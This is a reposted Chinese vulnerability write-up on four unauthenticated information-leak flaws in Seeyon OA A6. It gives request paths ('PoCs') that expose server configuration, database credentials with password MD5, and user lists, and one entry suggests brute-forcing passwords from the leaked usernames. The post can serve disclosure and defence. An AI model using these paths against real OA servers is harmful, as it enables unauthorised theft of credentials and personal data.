警告
请勿使用本文提到的内容违反法律。
本文不提供任何担保
一、分类
- 致远OA A6 config.jsp 敏感信息泄漏漏洞
- 致远OA A6 initDataAssess.jsp 存在用户敏感信息泄露
- 致远OA A6 createMysql.jsp 数据库敏感信息泄露
- 致远OA A6 DownExcelBeanServlet 用户敏感信息泄露
二、致远OA A6 config.jsp 敏感信息泄漏漏洞
(一)概述
致远OA A6 **config.jsp页面**可未授权访问,导致敏感信息泄漏漏洞,攻击者通过漏洞可以获取服务器中的敏感信息。
(二)漏洞复现
验证poc如下:
/yyoa/ext/trafaxserver/SystemManage/config.jsp
三、致远OA A6 initDataAssess.jsp 用户敏感信息泄露漏洞
(一)概述
致远OA A6 **initDataAssess.jsp** 存在用户敏感信息泄露,可以通过得到的用户名爆破用户密码进入后台进一步攻击。
(二)漏洞复现
验证poc如下:
/yyoa/assess/js/initDataAssess.jsp
四、致远OA A6 createMysql.jsp 数据库敏感信息泄露漏洞
(一)概述
致远OA A6 存在**数据库敏感信息泄露**,攻击者可以通过访问特定的URL获取数据库账户以及密码 MD5。
(二)漏洞复现
验证poc如下:
/yyoa/createMysql.jsp
/yyoa/ext/createMysql.jsp
五、致远OA A6 DownExcelBeanServlet 用户敏感信息泄露
(一)概述
致远OA A6 存在某个未授权的接口导致任意访问者可**下载OA中的用户信息**。
(二)漏洞复现
验证poc如下:
/yyoa/DownExcelBeanServlet?contenttype=username&contentvalue=&state=1&per_id=0
本文转载自: https://blog.csdn.net/xiaofengdada/article/details/124574025
版权归原作者 xiaochuhe. 所有, 如有侵权,请联系我们删除。
版权归原作者 xiaochuhe. 所有, 如有侵权,请联系我们删除。